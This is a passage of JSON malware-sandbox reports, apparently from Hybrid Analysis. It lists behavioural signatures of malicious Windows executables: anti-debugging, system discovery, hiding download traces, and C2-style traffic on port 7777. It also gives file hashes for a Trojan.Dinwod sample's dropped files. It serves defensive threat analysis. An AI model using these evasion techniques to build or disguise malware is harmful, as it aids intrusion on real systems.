\"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe.config\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Client\\\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.INI\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe.Local\\\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe:Zone.Identifier\"\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.ServiceModel\\v4.0_4.0.0.0__b77a5c561934e089\\System.ServiceModel.INI\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"LoadResource with parameter \" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"GetVersionExA\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"GetLocaleInfoW\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"RtlGetNtProductType\" (UID: 00000000-00006120)\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"GetWindowTextW\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" queries volume information of \"C:\\129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" at 00000000-00006120-0000010C-4095295\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" queries volume information of \"C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.ServiceModel\\v4.0_4.0.0.0__b77a5c561934e089\\System.ServiceModel.dll\" at 00000000-00006120-0000010C-137212215\n \"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" queries volume information of \"C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.ServiceModel\\v4.0_4.0.0.0__b77a5c561934e089\\System.ServiceModel.dll\" at 00000000-00006120-0000010C-137609251", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"RtlGetVersion\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"IsWow64Process\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"CreateCompatibleBitmap\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called \"CreateToolhelp32Snapshot\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"DeleteDC\" (Source: 129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493, API is part of module: GDI32.DLL)\n Found string \"CryptHashData\" (Source: 129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493, API is part of module: CRYPTSP.DLL)\n Found string \"GetCurrentThreadId\" (Source: 129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493, API is part of module: KERNELBASE.DLL)\n Found string \"GetWindowThreadProcessId\" (Source: 129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493, API is part of module: USER32.DLL)\n Found string \"shutdown\" (Source: 129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493, API is part of module: WS2_32.DLL)\n Found string \"Escape\" (Source: 60001f9-_~_, API is part of module: GDI32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" at 00000000-00006120-00000105-6716718", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 6120)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"C:\\129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" connects to <IPv4> on port 7777 (TCP)", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-28", "type": 6, "relevance": 3, "name": "Adjusts debug privileges", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" adjusted SE_DEBUG_PRIVILEGE on file \"C:\\Windows\\System32\\cryptsp.dll\"", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" opened \"C:\\129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-42", "type": 6, "relevance": 7, "name": "Tries to hide tracks of having downloaded a file from the internet", "description": "\"129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe\" opened \"C:\\129dbf173e38d9d37f8c66513290a30bc0790e9fdcdb5c9043a399ee6c889493.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 7777", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-8", "type": 7, "relevance": 7, "name": "Sends network traffic on the official file transfer ports", "description": "Oracle cluster file system traffic to <IPv4> on port 7777", "origin": "Network Traffic", "attck_id": "T1071.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e
https://hybrid-analysis.com/sample/24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e
Hybrid Analysis - Infostealers
{"size": 342012, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e", "sha256": "24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 105, "extracted_files": [{"name": "00008.exe", "file_path": "C:\\00008.exe", "file_size": 342854, "sha256": "71829c57841c45bc2fe72652492e32e96d1d4323096b296dd3dbb524bcc1c190", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00008.exe (PID: 3416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0002220.exe", "file_path": "C:\\0002220.exe", "file_size": 342731, "sha256": "cdb07b20a8a2c502ec302a717c198c3ec571853b5ad97d71053350e958a36931", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8080842.exe (PID: 1468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "00688.exe", "file_path": "C:\\00688.exe", "file_size": 342265, "sha256": "899aa4bd2bb5e24389078c494c3b29d6e4ac32d6a32812049eef781c4c434228", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "thdpjd.exe (PID: 4172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "02684.exe", "file_path": "C:\\02684.exe", "file_size": 342694, "sha256": "6e3f7aa6fa2f25c7bf34fa38ed414f4874e1c3ce4e2225a822ee481451e04adc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "68606.exe (PID: 4400)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "04284.exe", "file_path": "C:\\04284.exe", "file_size": 342125, "sha256": "cd930c88e5668c0c72de5dc8833d0e42bd8e1a711ec3dccf636351979a6728ef", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "464446.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0604428.exe", "file_path": "C:\\0604428.exe", "file_size": 342537, "sha256": "2b5e81e1844f7c94972bd5a4dad8a709166666db48cdf43f119ee58efaff2f57", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0604428.exe (PID: 3568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "064260.exe", "file_path": "C:\\064260.exe", "file_size": 342037, "sha256": "05fa5d8250081a6bb1e2fc963901ee33699856c6c7d4443a26e92d1207e85d1f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tfxnptb.exe (PID: 5984)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "08466.exe", "file_path": "C:\\08466.exe", "file_size": 342428, "sha256": "8112540ebc8f3ca60c35843519524b7b5bff6b546efd25996ec779bf197bcc0c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6824004.exe (PID: 1908)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0888688.exe", "file_path": "C:\\0888688.exe", "file_size": 342705, "sha256": "81d7536820c8ba98c58c391677cbffa5fcfd2cd79680368f60b8cf9eb76616ca", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "02684.exe (PID: 3200)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2022484.exe", "file_path": "C:\\2022484.exe", "file_size": 342292, "sha256": "c6265275d1df1f64415d2d6b8586d9ecc12b851866faa31475f435e6680c4696", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8644820.exe (PID: 772)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "464446.exe", "file_path": "C:\\464446.exe", "file_size": 342111, "sha256": "4b30cb1217016f940b3157588e2e6857c1d756e8eb6ca3da1d7fb6ae4a41c1ce", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "464446.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "482088.exe", "file_path": "C:\\482088.exe", "file_size": 342518, "sha256": "6c3566cc86c99ee3ba857fad0d05d2c945b58eef1ca6b9dfed7a176809e5d9bf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lbdtbf.exe (PID: 1184)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4824668.exe", "file_path": "C:\\4824668.exe", "file_size": 342884, "sha256": "570b8e6715922e5364ce794ce0926d67cb2fb863f69dda1aa693a2d2642149df", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "66446.exe (PID: 3556)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "604424.exe", "file_path": "C:\\604424.exe", "file_size": 342751, "sha256": "59a5f21d5ee9f734e184d08710b06334e3e9c34bb1694edf454d00b9cec1694e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0002220.exe (PID: 1544)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "628008.exe", "file_path": "C:\\628008.exe", "file_size": 342057, "sha256": "a8c3a0b41de0e5f5194a4bb7bb2984f9d8c5180b8383184f4173565c8632833b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "628008.exe (PID: 5764)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "66446.exe", "file_path": "C:\\66446.exe", "file_size": 342867, "sha256": "096536d36aaed36e0bb05f4ff4a317bc512f1572a0a395f6f9ba6d24b7f2e002", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00008.exe (PID: 3416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6824004.exe", "file_path": "C:\\6824004.exe", "file_size": 342416, "sha256": "1b8c5aa9f3ddc81168fb6fa44a7174ab1b63b60473a112c1322b3f9800c6a7a6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nnpbn.exe (PID: 4076)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "68606.exe", "file_path": "C:\\68606.exe", "file_size": 342677, "sha256": "bc72fa34e9e5a5afce8fce14a8a598679e4a7ff645f297f1e4cb5cad317735c4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8064284.exe (PID: 1744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8064284.exe", "file_path": "C:\\8064284.exe", "file_size": 342667, "sha256": "2b7b1358d9ff7d64245d34900718274a6c095e9e137555be4f4c0a3e2ea6baae", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8064284.exe (PID: 1744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8080842.exe", "file_path": "C:\\8080842.exe", "file_size": 342718, "sha256": "230d30e951284b47116a1551d212a6cbf64cee863c57045104b175540b83a1df", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8080842.exe (PID: 1468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8644820.exe", "file_path": "C:\\8644820.exe", "file_size": 342281, "sha256": "b313b57d5e21524cbfb556fe4299c4b0a9f1582d44ac6a0a406b738eb1abed56", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00688.exe (PID: 3708)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8822846.exe", "file_path": "C:\\8822846.exe", "file_size": 342448, "sha256": "3294b19b2b61294ae1bb331ebe2df3d1a9bebc1f6550fec14219cf0e100a9264", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8822846.exe (PID: 3040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bjdlj.exe", "file_path": "C:\\bjdlj.exe", "file_size": 342910, "sha256": "040755e300fc18cc7b807001fc4a2959bef1a40d94a9c1b09e0df662c736a835", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bjdlj.exe (PID: 3832)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "blpvx.exe", "file_path": "C:\\blpvx.exe", "file_size": 342650, "sha256": "7814cf8bd7daeaf9152437d575055558ff2ab7f1fc001ab82d12440831e40786", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "blpvx.exe (PID: 3492)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bnxtdj.exe", "file_path": "C:\\bnxtdj.exe", "file_size": 342369, "sha256": "cd23ba6f8c7c4100d7a9598d0589b53da5f5c9feaa482c8652edb597b9e5a604", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jnnjf.exe (PID: 1896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dnhpbvd.exe", "file_path": "C:\\dnhpbvd.exe", "file_size": 342462, "sha256": "a1da63793d57b120a0f6c92e808526422423514485f6e580753c34486d2c474e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8822846.exe (PID: 3040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dnjtl.exe", "file_path": "C:\\dnjtl.exe", "file_size": 342576, "sha256": "f039f316e1e610549dcb406ac54bf341d5ef2b7ea2291cd135dcd04ba90423a1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lpnpn.exe (PID: 2888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ffpfpp.exe", "file_path": "C:\\ffpfpp.exe", "file_size": 342237, "sha256": "4c50a8fa8d8349977f8133932743f263d46f1d52594afad94f945d862ce1069e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ffpfpp.exe (PID: 6020)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ftbltx.exe", "file_path": "C:\\ftbltx.exe", "file_size": 342951, "sha256": "df59ff4961e252d3285fdf60bb22209b437059005b85e11432c1ef1a72fdd313", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xrfjx.exe (PID: 4468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fxlrjhd.exe", "file_path": "C:\\fxlrjhd.exe", "file_size": 342474, "sha256": "8e7e5383c4d216fd4231f03a0b264ac81692b4bacd99a3003925734452b4ee14", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fxlrjhd.exe (PID: 2076)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fxxdb.exe", "file_path": "C:\\fxxdb.exe", "file_size": 342494, "sha256": "e6532104c881af7b9a0620492a0953d45bc13810dfd26e0906a4073f7a6d6bee", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fxxdb.exe (PID: 2768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hbbtpvh.exe", "file_path": "C:\\hbbtpvh.exe", "file_size": 342613, "sha256": "18360215d7cfcaf8b1ce5527bf185acd01943bb205196a23fff6f4b28ffc57f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jnbhhn.exe (PID: 1740)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hnndln.exe", "file_path": "C:\\hnndln.exe", "file_size": 342630, "sha256": "69a64c5b1b49eb2a2f4a6f9c9b2919ee38214082754955d4d405c79d9de2d072", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hnndln.exe (PID: 1708)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hrbbfnh.exe", "file_path": "C:\\hrbbfnh.exe", "file_size": 342199, "sha256": "dba2e5ec5fd1641231b890877d11dff8c8f17a3ba1958c9008f8714399b1e54d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xpldnr.exe (PID: 6028)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "httbh.exe", "file_path": "C:\\httbh.exe", "file_size": 342335, "sha256": "f8883099975623d7512ae27e326d051a94c152c6afd31249fabf5096f735021b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "httbh.exe (PID: 1888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jbdtnd.exe", "file_path": "C:\\jbdtnd.exe", 